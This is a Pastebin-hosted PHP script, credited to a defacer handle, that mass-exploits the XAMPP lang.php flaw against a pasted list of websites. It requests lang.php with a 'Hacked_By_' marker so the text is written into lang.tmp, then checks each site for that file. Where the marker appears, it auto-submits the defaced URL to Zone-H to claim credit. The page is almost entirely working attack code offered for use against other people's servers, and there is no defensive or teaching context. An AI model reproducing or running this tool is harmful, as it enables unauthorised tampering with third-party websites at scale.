K4MVR3T717

[PHP] Mass XAMPP Lang + Auto Submit Zone-H

Sep 3rd, 2016
253
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.80 KB | None | 0 0
  1. <?php // K4MVR3T717 - Www.IndoFree-Security.Blogspot.Com
  2. @set_time_limit(0);
  3.  
  4. $hekerr = "K4MVR3T717"; // Your Nick
  5.  
  6. echo "<form method='POST'>
  7. <style>
  8. textarea
  9. {
  10. font-size: 15px;
  11. font-family: Tahoma;
  12. color: #708090;
  13. border:solid 1px #708090;
  14. }
  15.  
  16. a {
  17. font-family: Tahoma;
  18. color:#708090;
  19. text-decoration:none;
  20. }
  21.  
  22. h1{
  23. font-family:Tahoma;
  24. color:#708090;
  25. }
  26.  
  27. table {
  28. width:700px;
  29. }
  30.  
  31. td {
  32. font-family: Tahoma;
  33. width:50%;
  34. text-align:center;
  35. border:1px solid #708090;
  36. }
  37.  
  38. .input
  39. {
  40. color: #708090;
  41. border: solid 1px #708090;
  42. background:#black;
  43. margin-top:3px;
  44. width:100px;
  45. }
  46.  
  47. i {
  48. color:##708090;
  49. }
  50. </style>
  51. <title>Mass XAMPP Lang + Zone-H Auto Submit</title>
  52. <body text='red' bgcolor='white'>
  53. <center>
  54. <h1>Mass XAMPP Lang + Zone-H Auto Submit</h1>
  55. <p>www.indofree-security.blogspot.com</p>
  56. <textarea name='sites' cols='50' rows='10'>www.localhost.com tanpa https://</textarea><br>
  57. <input type='submit' name='scan' value='SCAN' class='input'><br>
  58. </form>";
  59.  
  60. if($_POST['scan'])
  61. {
  62. echo "<hr>"; // else if hr
  63. $site = explode("\r\n",$_POST['sites']);
  64. foreach($site as $sites)
  65. {
  66.  
  67. $xxampp = "/xampp/lang.php?Hacked_By_K4MVR3T717";
  68. $xamppcurl = curl_init("{$sites}/$xxampp");
  69. curl_setopt($xamppcurl, CURLOPT_FAILONERROR, true);
  70. curl_setopt($xamppcurl, CURLOPT_FOLLOWLOCATION, true);
  71. curl_setopt($xamppcurl, CURLOPT_RETURNTRANSFER, true);
  72. $resultxampp = curl_exec($xamppcurl);
  73.  
  74. $xsecurity = "/security/lang.php?Hacked_By_K4MVR3T717";
  75. $securitycurl = curl_init("{$sites}/$xsecurity");
  76. curl_setopt($securitycurl, CURLOPT_FAILONERROR, true);
  77. curl_setopt($securitycurl, CURLOPT_FOLLOWLOCATION, true);
  78. curl_setopt($securitycurl, CURLOPT_RETURNTRANSFER, true);
  79. $resultsecurity = curl_exec($securitycurl);
  80.  
  81. $xxampptmp = "/xampp/lang.tmp";
  82. $xampptmpcurl = curl_init("{$sites}/$xxampptmp");
  83. curl_setopt($xampptmpcurl, CURLOPT_FAILONERROR, true);
  84. curl_setopt($xampptmpcurl, CURLOPT_FOLLOWLOCATION, true);
  85. curl_setopt($xampptmpcurl, CURLOPT_RETURNTRANSFER, true);
  86. $resultxampptmp = curl_exec($xampptmpcurl);
  87.  
  88. $xsecuritytmp = "/security/lang.tmp";
  89. $securitytmpcurl = curl_init("{$sites}/$xsecuritytmp");
  90. curl_setopt($securitytmpcurl, CURLOPT_FAILONERROR, true);
  91. curl_setopt($securitytmpcurl, CURLOPT_FOLLOWLOCATION, true);
  92. curl_setopt($securitytmpcurl, CURLOPT_RETURNTRANSFER, true);
  93. $resultsecuritytmp = curl_exec($securitytmpcurl);
  94.  
  95.  
  96. if(eregi("Hacked_By_",$resultxampptmp))
  97. {
  98. echo "<a href='http://$sites/$xxampptmp' style='text-decoration: none'>{$sites}$xxampptmp</a><br>Xampp/Lang<br>";
  99.  
  100. $finalxampp=($sites).($xxampptmp);
  101. $ch = curl_init ("http://www.zone-h.com/notify/single");
  102. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  103. curl_setopt ($ch, CURLOPT_POST, 1);
  104. curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=$hekerr&domain1=$finalxampp&hackmode=1&reason=1");
  105. if (preg_match ("/color=\"red\">DEFACED<\/font><\/li>/i", curl_exec ($ch))){
  106. echo "Zone-h : OK<hr>";
  107. }else{
  108. echo "Zone-h : NO<hr>"; }
  109. curl_close ($ch);
  110. }
  111.  
  112. else if(eregi("Hacked_By_",$resultsecuritytmp))
  113. {
  114. echo "<a href='http://$sites/$xsecuritytmp' style='text-decoration: none'>{$sites}$xsecuritytmp</a><br>Security/Lang<br>";
  115.  
  116. $finalsecurity=($sites).($xsecuritytmp);
  117. $ch = curl_init ("http://www.zone-h.com/notify/single");
  118. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  119. curl_setopt ($ch, CURLOPT_POST, 1);
  120. curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=AHS-CREW&domain1=$finalsecurity&hackmode=1&reason=1");
  121. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
  122. echo "Zone-h : DONE<hr>";
  123. }else{
  124. echo "Zone-h : ERROR<hr>"; }
  125. curl_close ($ch);
  126. }
  127.  
  128. else
  129. {
  130. echo "<a href='http://$sites/'>$sites</a><br>ERROR<hr>";
  131. }
  132. }
  133.  
  134. }
  135. ?>
Advertisement
Add Comment
Please, Sign In to add comment